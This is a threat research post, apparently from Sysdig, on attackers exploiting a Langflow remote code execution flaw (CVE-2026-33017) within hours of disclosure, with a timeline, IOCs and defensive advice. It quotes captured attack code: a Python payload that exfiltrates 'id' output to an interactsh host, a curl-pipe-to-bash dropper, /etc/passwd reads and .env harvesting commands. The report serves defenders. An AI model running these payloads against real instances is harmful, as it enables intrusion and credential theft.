On March 17, 2026, a critical vulnerability was disclosed in Langflow, the open-source visual framework for building AI agents and Retrieval-Augmented Generation (RAG) pipelines. The vulnerability, CVE-2026-33017, is an unauthenticated remote code execution (RCE) in the public flow build endpoint that allows attackers to execute arbitrary Python code on any exposed Langflow instance, with no credentials required and only a single HTTP request to get moving.

Within 20 hours of the advisory’s publication, the Sysdig Threat Research Team (TRT) observed the first exploitation attempts in the wild. No public proof-of-concept (PoC) code existed at the time. Attackers built working exploits directly from the advisory description and began scanning the internet for vulnerable instances. Exfiltrated information included keys and credentials, which provided access to connected databases and potential software supply chain compromise.

Within hours of the advisory, the Sysdig TRT deployed a fleet of honeypot nodes with vulnerable Langflow instances across multiple cloud providers and regions. What followed was a textbook demonstration of how quickly modern threat actors are operationalizing new vulnerabilities. Our findings are detailed below.

Timeline

The gap between advisory publication and first exploitation was approximately 20 hours. This is notable because no public PoC repository existed on GitHub at the time of the first attack. The advisory itself contained enough detail (the vulnerable endpoint path and the mechanism for code injection via flow node definitions) for attackers to construct a working exploit without additional research.

About CVE-2026-33017

Langflow is a popular open-source platform (145,000+ GitHub stars). It enables users to build AI workflows using a visual drag-and-drop interface. Langflow provides a REST API that allows programmatic interaction with flows, including building and executing them.

CVE-2026-33017 affects the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint, which is designed to allow unauthenticated users to build public flows. The vulnerability arises because this endpoint accepts attacker-supplied flow data containing arbitrary Python code in node definitions, which is then executed server-side without sandboxing. This is distinct from CVE-2025-3248, an earlier Langflow RCE added to CISA's Known Exploited Vulnerabilities catalog in May 2025. CVE-2026-33017 has not yet been added to the KEV despite confirmed active exploitation.

What Sysdig TRT observed

Over the course of 48 hours following the advisory publication, we recorded CVE-2026-33017 exploit events from 6 unique source IPs across our honeypot fleet.

Phase 1: Automated Scanning (hours 20-21)

The earliest attempts at exploitation came from automated scanning infrastructure. Four source IPs arrived within minutes of each other, all sending an identical payload. These likely represent a single operator scanning through multiple proxies or VPS nodes rather than four independent attackers:

_r = __import__('os').popen('id').read()
_enc = __import__('base64').b64encode(_r.encode()).decode()
__import__('urllib.request').request.urlopen('http://<unique-subdomain>.oast.*//' + _enc)

The payload executes id, base64-encodes the output, and exfiltrates it to an interactsh callback server. Each request uses a unique interactsh subdomain, but the code template is identical across all IPs.

16:04:57 UTC — 77.110.106.154 → id → d6tcpc6fl...oast.* callback
16:05:23 UTC — 209.97.165.247 → id → d6tcpcjhc...oast.* callback
16:08:41 UTC — 188.166.209.86 → id → d6tcpe7ns...oast.* callback
16:39:32 UTC — 205.237.106.117 → id → d6td5s9qt...oast.* callback

The requests explicitly identify themselves as nuclei. Every exploit request includes Cookie: client_id=nuclei-scanner in the headers, and a preceding flow creation request names the flow nuclei-cve-2026-33017:

Cookie: client_id=nuclei-scanner

{"name": "nuclei-cve-2026-33017", "data": {"nodes": [], "edges": []}}

The named exploit requests, in addition to other characteristics, suggest nuclei as the scanning tool:

• User-Agent rotation: One IP (205.237.106.117) used seven different User-Agent (UA) strings across eight requests, including Knoppix; Linux i686 and Fedora; Linux i686. These appear in nuclei's random User-Agent wordlist and are not sent by any real browser.
• Identical payload template: Every request across all four IPs uses the same Python code structure with only the interactsh callback subdomain varying, consistent with a nuclei template using the {{interactsh-url}} placeholder.

At the time of this writing, no CVE-2026-33017 template exists in the official nuclei-templates repository. Therefore, what we identified is likely a privately authored template, written and deployed at scale within hours of disclosure. Whether the template author is the same person operating the scans or distributing the template to others is unclear from this data alone.

Phase 2: Custom exploit scripts (hours 21-24)

In contrast to the nuclei scans, a second class of attacker appeared using custom Python scripts (python-requests/2.32.3, consistent across all requests, no UA rotation). These operators moved beyond validation into active reconnaissance. One attacker (83.98.164.238) progressed through a methodical kill chain:

1. Directory listing and credential files: ls -al /root; ls /app; cat /etc/passwd
2. System fingerprint: id (returned uid=1000(langflow))
3. Stage-2 delivery attempt: bash -c "$(curl -fsSL http://173.212.205.251:8443/z)"

The stage-2 dropper URL (http://173.212.205.251:8443/z) indicates the attacker had pre-staged infrastructure ready to deploy once they confirmed a vulnerable target. This is not ad-hoc testing. This is an attacker with a prepared exploitation toolkit moving from vulnerability validation to payload deployment in a single session.

Phase 3: Data harvesting (hours 24-30)

The most advanced activity came from IP 173.212.205.251, which conducted a thorough credential harvesting operation:

• Environment variable dump: Executed env to capture the full process environment, which in a typical Langflow deployment includes database connection strings, API keys, and cloud credentials.
• File system enumeration: Ran find /app -name "*.db" -o -name "*.env" to locate configuration files and databases.
• Targeted file reads: Extracted the contents of .env files containing application secrets.

Shared infrastructure

Two of the source IPs running custom exploit scripts (83.98.164.238 and 173.212.205.251) both exfiltrated data to the same command-and-control server at 143.110.183.86:8080. The stage-2 dropper was also hosted on 173.212.205.251:8443. This overlap likely indicates a single operator working through multiple proxies or VPS nodes, though it could also reflect a shared exploitation toolkit.

What this means for defenders

The 20-hour window between advisory publication and first exploitation is consistent with an accelerating trend that the Zero Day Clock project has been tracking across 83,000+ CVEs. The data shows the median time-to-exploit (TTE) has collapsed from 771 days in 2018 to just hours in 2024. By 2023, 44% of exploited vulnerabilities were weaponized within 24 hours of disclosure, and 80% of public exploits appeared before the official advisory was even published. Our observation of CVE-2026-33017 fits squarely in this trend: working exploits appeared within a day, built from nothing more than the advisory text.

This timeline compression poses serious challenges for defenders. The median time for organizations to deploy patches is approximately 20 days, meaning defenders are exposed and vulnerable for far too long. Threat actors are monitoring the same advisory feeds that defenders use, and they are building exploits faster than most organizations can assess, test, and deploy patches. Organizations must completely reconsider their vulnerability programs to meet reality.

Furthermore, several factors likely made CVE-2026-33017 particularly attractive to attackers:

• No authentication required. The vulnerable endpoint is publicly accessible by design, meaning mass scanning is trivially automated.
• Simple exploitation. The attack requires a single HTTP POST request with a JSON payload: no multi-step chains, no session management, no CSRF tokens.
• Massive attack surface. Langflow's 145,000+ GitHub stars translate to a large number of exposed instances. Many are deployed by data science teams who may not follow the same patching cadence as production infrastructure.
• High-value targets and software supply chain compromise. Langflow instances are configured with API keys for OpenAI, Anthropic, AWS, and database connections. Compromising one instance can provide lateral access to cloud accounts and data stores.

Runtime detection

When the patch window collapses to hours, runtime detection becomes the primary line of defense. The exploitation patterns observed in this campaign produce clear signals at the system call level that tools like Falco and Sysdig Secure are designed to catch, without any prior knowledge of the specific CVE.

Every attacker in this campaign followed the same post-exploitation playbook: execute a shell command via Python's os.popen(), then exfiltrate the output over HTTP. Each stage of this kill chain maps to existing Falco rules provided out of the box that ship with Sysdig Secure:

The key advantage of runtime detection in this context is that it works on day zero. These rules do not require a signature for CVE-2026-33017 specifically because they detect the exploitation behavior, not the vulnerability. The same rules would fire regardless of whether the initial access came through CVE-2026-33017, CVE-2025-3248, or any other RCE in an application.

Indicators of Compromise

Source IPs

C2 and staging infrastructure

Dropper URLs

http://143.110.183.86:8080/
http://173.212.205.251:8443/z

Interactsh callback domains

Twelve unique interactsh subdomains were observed across the nuclei scanning activity, using .oast.live, .oast.me, .oast.pro, and .oast.fun TLDs. Below is one sample:

d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live
d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me
d6td5s9qte0bea7273e0wuou77jjx77uk.oast.pro
d6tgbe1qte0a8rkffb3gqabqm8517exd3.oast.fun

Note: Source IPs may be proxies or VPS nodes rather than the operator's true origin. The interactsh subdomains are ephemeral and rotate per scan.

Recommendations

• Update Langflow immediately. If a patched version is not yet available, restrict network access to the /api/v1/build_public_tmp endpoint or disable public flow building entirely.
• Audit environment variables and secrets on any publicly exposed Langflow instance. Rotate API keys, database passwords, and cloud credentials as a precaution.
• Monitor for outbound connections to unusual ports or known callback services (oastify.com, interact.sh, dnslog.cn), which indicate active exploitation and data exfiltration.
• Restrict network access to Langflow instances using firewall rules or a reverse proxy with authentication. Langflow should not be directly exposed to the internet without an authentication layer.
• Inventory the AI/ML tooling in your environment. Platforms like Langflow, n8n, and other workflow automation tools are increasingly targeted because they often run with broad API access and are deployed outside of standard security review processes.

Conclusion

CVE-2026-33017, which served as sufficient documentation for threat actors to build working exploits, demonstrates a pattern that is becoming the norm rather than the exception: critical vulnerabilities in popular open-source tools are weaponized within hours of disclosure, often before public PoC code is even available. Furthermore, AI workloads are increasingly falling into threat actors’ crosshairs as they offer high-value data, software supply chain access, and often lack robust security. As Zero Day Clock makes clear, this is not an outlier. The collapse from months-long exploitation timelines to same-day weaponization is a structural shift in how vulnerabilities are exploited today.

For defenders, the practical takeaway is that the window between "advisory publication" and "active exploitation" is now measured in hours, not days or weeks. Organizations that rely on scheduled patch cycles to address critical vulnerabilities are operating on a timeline that attackers have already outpaced. Runtime detection, network segmentation, and rapid response capabilities are essential to bridging the gap between disclosure and remediation.